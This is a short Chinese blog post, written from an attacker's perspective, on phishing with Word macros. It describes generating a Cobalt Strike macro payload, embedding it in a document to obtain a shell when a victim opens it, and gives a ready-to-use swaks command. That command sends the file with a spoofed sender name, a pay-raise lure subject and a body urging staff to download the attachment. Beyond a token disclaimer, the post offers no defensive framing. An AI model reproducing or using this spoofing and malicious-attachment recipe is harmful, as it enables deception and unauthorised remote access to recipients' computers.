浅谈利用邮件进行社会工程学攻击

在日常工作中，形形色色的各种办公软件已经离不开我们。而利用各种word excel ppt进行各种攻击。本文将从攻击者的角度进行演示，请勿非法、恶意攻击他人。

宏的认识

宏就是一些命令组织在一起，作为一个单独命令完成一个特定任务。Microsoft Word中对宏定义为:"宏就是能组织到一起作为一独立的命令使用的一系列word命令，它能使日常工作变得更容易"。Word使用宏语言Visual Basic将宏作为一系列指令来编写。

利用CS生成宏

首先登录CS

创建监听

生成宏
点击attacks-packages-ms office macro

然后点击Copy Macro

创建带宏的WORD文档

保存文件后，运行文件！成功得到shell

发送你的文件

利用SWAKS，我们可以更加便捷的将带有宏的word文档发给他人。
使用示例如下：

swaks --to 136****[email protected] --from l***[email protected] --h-From: '"秘书小爱"<[email protected]>' --header "Subject: 关于集团年底涨薪申请word模板更新的通告" --body "各位一线工程师，集团对外word统一格式，请下载附件使用，谢谢合作！" --attach-name 渗透报告模版.doc --attach-type application/msword --attach /tmp/渗透报告模版.doc --server smtp.163.com   -p 25 -au 发件箱@163.com  -ap SMTP密码

这样当被人打开word文档后，我们就可以获得相应的sheel.

注意

随着office版本的升高，需要生成宏模板才可以。
我的博客即将同步至腾讯云+社区，邀请大家一同入驻：https://cloud.tencent.com/developer/support-plan?invite_code=2fukfwn4c9s0s